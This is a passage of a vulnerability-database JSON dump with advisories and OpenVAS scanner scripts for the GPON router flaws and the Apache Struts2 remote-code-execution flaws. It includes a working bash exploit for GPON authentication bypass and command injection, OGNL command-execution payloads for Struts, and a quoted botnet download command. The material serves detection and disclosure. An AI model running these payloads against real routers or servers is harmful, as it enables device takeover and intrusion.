"OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2018"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:141900"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11776"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804"]}, {"type": "talosblog", "idList": ["TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:ACD3479531482E2CA5A8E15EB6B47523"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:2F30C320035805DB537579B86877517E", "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:54ECD02964DEF33573316A94BCE772BD", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "THREATPOST:71D009F9EE75DCAB294A6C41460E4C3C", "THREATPOST:7AEB059D9D2E83A2B3DFA86EB53E902D", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:A76574D355121BF2CD247CC2DEB6022B", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CB1132219D5713747CDA17DB009B4B24", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "vmware", "idList": ["VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-5638", "epss": "0.975380000", "percentile": "0.999830000", "modified": "2023-03-15"}, {"cve": "CVE-2017-6884", "epss": "0.969530000", "percentile": "0.995070000", "modified": "2023-03-15"}, {"cve": "CVE-2018-10561", "epss": "0.975200000", "percentile": "0.999700000", "modified": "2023-03-15"}, {"cve": "CVE-2018-10562", "epss": "0.975860000", "percentile": "0.999990000", "modified": "2023-03-15"}, {"cve": "CVE-2018-11776", "epss": "0.975560000", "percentile": "0.999920000", "modified": "2023-03-15"}, {"cve": "CVE-2018-9866", "epss": "0.648390000", "percentile": "0.972820000", "modified": "2023-03-15"}], "vulnersScore": 0.5}, "_state": {"dependencies": 1678917980, "score": 1683995507, "epss": 1678938645}, "_internal": {"score_hash": "b12219dbf54b119cffbddd723a5286e0"}}

{"seebug": [{"lastseen": "2018-06-26T22:18:25", "description": "### Overview:\r\nWe conducted a comprehensive assessment on a number of GPON home routers. Many routers today use GPON internet, and we found a way to bypass all authentication on the devices (CVE-2018-10561). With this authentication bypass, we were also able to unveil another command injection vulnerability (CVE-2018-10562) and execute commands on the device.\r\n\r\n### Exploitation:\r\nDuring our analysis of GPON firmwares, we found two different critical vulnerabilities (CVE-2018-10561 & CVE-2018-10562) that could, when combined allow complete control on the device and therefore the network. The first vulnerability exploits the authentication mechanism of the device that has a flaw. This flaw allows any attacker to bypass all authentication.\r\n\r\nThe flaw can be found with the HTTP servers, which check for specific paths when authenticating. This allows the attacker to bypass authentication on any endpoint using a simple trick.\r\n\r\nBy appending ?images/ to the URL, the attacker can bypass the endpoint.\r\n\r\nThis works on both HTML pages and GponForm/\r\n\r\nFor instance, by inserting\r\n```\r\n/menu.html?images/\r\n```\r\nor\r\n```\r\n/GponForm/diag_FORM?images/\r\n```\r\n\r\nwe can manage the device.\r\n\r\nWhile looking through the device functionalities, we noticed the diagnostic endpoint contained the ping and traceroute commands. It didn\u2019t take much to figure out that the commands can be injected by the host parameter.\r\n\r\nSince the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it\u2019s quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.\r\n\r\nWe include the following bash version of the exploit code:\r\n```\r\n#!/bin/bash\r\n\r\necho \u201c[+] Sending the Command\u2026 \u201c\r\n# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices\r\ncurl -k -d \u201cXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\\`$2\\`;$2&ipv=0\u201d $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null\r\necho \u201c[+] Waiting\u2026.\u201d\r\nsleep 3\r\necho \u201c[+] Retrieving the ouput\u2026.\u201d\r\ncurl -k $1/diag.html?images/ 2>/dev/null | grep \u2018diag_result = \u2018 | sed -e \u2018s/\\\\n/\\n/g\u2019\r\n```\r\n\r\nvideo:\r\n\r\nhttps://youtu.be/2tgRJa58jY0\r\n\r\n### Impact:\r\nGPON is a type of passive optical network that uses fiber-optics and is particularly popular. When people use GPON, the routers are provided by ISPs. In the video, you can see that over one million people use this type of network system router.\r\n\r\nWe tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise.\r\n\r\n### Recommendations:\r\n* Check if your router uses the GPON network.\r\n* Be aware that GPON routers can be hacked and exploited.\r\n* Talk to your ISP to see what they can do to fix the bug.\r\n* Warn your friends on Facebook (click here to share) and Twitter (click here to tweet).", "cvss3": {}, "published": "2018-05-02T00:00:00", "type": "seebug", "title": "Critical RCE Vulnerability Found in Over a Million GPON Home Routers", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562"], "modified": "2018-05-02T00:00:00", "id": "SSV:97258", "href": "https://www.seebug.org/vuldb/ssvid-97258", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:05:43", "description": "It is possible to perform a RCE attack with a malicious Content-Disposition value or with improper Content-Length header. If the Content-Dispostion / Content-Length value is not valid an exception is thrown which is then used to display an error message to a user. This is a different vector for the same vulnerability described in [S2-045](https://cwiki.apache.org/confluence/display/WW/S2-045) (CVE-2017-5638).", "cvss3": {}, "published": "2017-03-21T00:00:00", "type": "seebug", "title": "S2-046: Struts 2 Remote Code Execution vulnerability\uff08CVE-2017-5638\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92804", "id": "SSV:92804", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:01:16", "description": "Based on the Jakarta plugin plugin Struts remote code execution vulnerability, a malicious user can upload a file by modifying the HTTP request header Content-Type value to trigger the vulnerability, and then execute the system command.\n\nSound detection method(the detection method by the constant company): the In to the server to issue the http request packet, modify the Content-Type field: `Content-Type:%{#context['com. opensymphony. xwork2. dispatcher. HttpServletResponse']. addHeader('vul','vul')}. multipart/form-data`\n\nSuch as the return response packets in the presence of vul: the vul field entry then indicates the presence of vulnerability.\n", "cvss3": {}, "published": "2017-03-06T00:00:00", "type": "seebug", "title": "S2-045: Struts 2 Remote Code Execution vulnerability\uff08CVE-2017-5638\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92746", "id": "SSV:92746", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-05-12T16:23:56", "description": "GPON Home Routers are prone to multiple vulnerabilities.\n\n Those vulnerabilities where known to be exploited by the Mettle, Muhstik, Mirai, Hajime, and Satori Botnets in 2018.", "cvss3": {}, "published": "2018-05-03T00:00:00", "type": "openvas", "title": "GPON Routers Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10562", "CVE-2018-10561"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310113170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# GPON Home Routers Multiple Vulnerabilities\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113170\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-03 16:26:55 +0200 (Thu, 03 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-10561\", \"CVE-2018-10562\");\n\n script_name(\"GPON Routers Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_gpon_home_router_detect.nasl\");\n script_mandatory_keys(\"gpon/home_router/detected\");\n\n script_tag(name:\"summary\", value:\"GPON Home Routers are prone to multiple vulnerabilities.\n\n Those vulnerabilities where known to be exploited by the Mettle, Muhstik, Mirai, Hajime, and Satori Botnets in 2018.\");\n\n script_tag(name:\"vuldetect\", value:\"The script tries to exploit both vulnerabilities and execute and 'id' command\n on the target and checks if it was successful.\");\n\n script_tag(name:\"insight\", value:\"There exist two vulnerabilities:\n\n - Appending '?images/' to the URL when accessing the router's web interface will bypass authentication\n\n - The 'ping' command of the router allows for code execution.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to gain complete control over\n the target.\");\n\n script_tag(name:\"affected\", value:\"All GPON Home Routers are possibly affected.\");\n\n script_tag(name:\"solution\", value:\"Contact the vendor to obtain a solution.\");\n\n script_xref(name:\"URL\", value:\"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/\");\n\n exit(0);\n}\n\nCPE = \"cpe:/o:gpon:home_router\";\n\ninclude( \"host_details.inc\" );\ninclude( \"http_func.inc\" );\ninclude( \"http_keepalive.inc\" );\ninclude( \"misc_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! get_app_location( cpe: CPE, port: port, nofork: TRUE ) ) exit(0);\n\n# Just execute a command that certainly doesn't exist\n# This allows for a safe check of command execution\nnon_command = rand_str( length: 12, charset: \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\" );\n\n# Older versions of GPON Home Routers use a direct html page link\nexploit_urls = make_list( '/GponForm/diag_Form?images/', '/menu.html?images/' );\nexploit_data = 'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\\\\`' + non_command + '\\\\`;' + non_command + '&ipv=0\"';\nresult_url = '/diag.html?images/';\n\nforeach url ( exploit_urls ) {\n req = http_post( port: port, item: url, data: exploit_data );\n # response is unimportant at this point, check for success happens on a different page\n http_keepalive_send_recv( port: port, data: req );\n}\n\n# Exploit needs a few seconds to take form\nsleep( 5 );\nreq = http_get( port: port, item: result_url );\nres = http_keepalive_send_recv( port: port, data: req );\nif( ! res || res !~ \"^HTTP/1\\.[01] 200\" )\n exit( 99 );\n\n# var diag_result = \"BusyBox... means ping command could be overwritten, but shell output could not be retrieved\n#\n# var diag_host = \"`busybox wget http://xxx/bins/hotaru.arm -O /tmp/gaf means the box has already been compromised\nif( string('sh: ', non_command, ': not found' ) >< res || 'diag_result = \"BusyBox v' >< res ) {\n report = http_report_vuln_url( port: port, url: result_url );\n VULN = TRUE;\n}\n\nif( expl = egrep( string:res, pattern:'var diag_host = \"`' ) ) {\n report = http_report_vuln_url( port: port, url: result_url );\n report += '\\n\\nNOTE: The device has already been exploited by an attacker with the following command: ' + expl;\n VULN = TRUE;\n}\n\nif( VULN ) {\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:44:50", "description": "It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108792", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108792\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-11776\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace.\");\n\n script_tag(name:\"insight\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace. (Vulnerability ID: HWPSIRT-2018-08200)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-11776.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this vulnerability to perform a remote code execution attack\");\n\n script_tag(name:\"affected\", value:\"Seco VSM versions V200R002C00\n\neLog versions V200R005C00 V200R006C10 V200R007C00SPC100\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181121-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:27", "description": "This host is running Apache Struts and is\n prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813786\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-23 12:45:43 +0530 (Thu, 23 Aug 2018)\");\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057)\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions\n when namespace value isn't set for a result defined in underlying configurations\n and in same time, its upper action(s) configurations have no or wildcard\n namespace. Same possibility when using url tag which doesn't have value and\n action set and in same time, its upper action(s) configurations have no or\n wildcard namespace.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attacker to possibly conduct remote code on the affected application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34,\n and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or\n 2.5.17 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:appPort, exit_no_version:TRUE)) exit(0);\nappVer = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:appVer, test_version:\"2.3\", test_version2:\"2.3.34\")){\n fix = \"2.3.35\";\n}\nelse if(version_in_range(version:appVer, test_version:\"2.5\", test_version2:\"2.5.16\")){\n fix = \"2.5.17\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:appPort);\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "description": "Cisco ISE is prone to a vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-13T00:00:00", "type": "openvas", "title": "Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_ise_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:identity_services_engine\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106640\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Identity Services Engine Apache 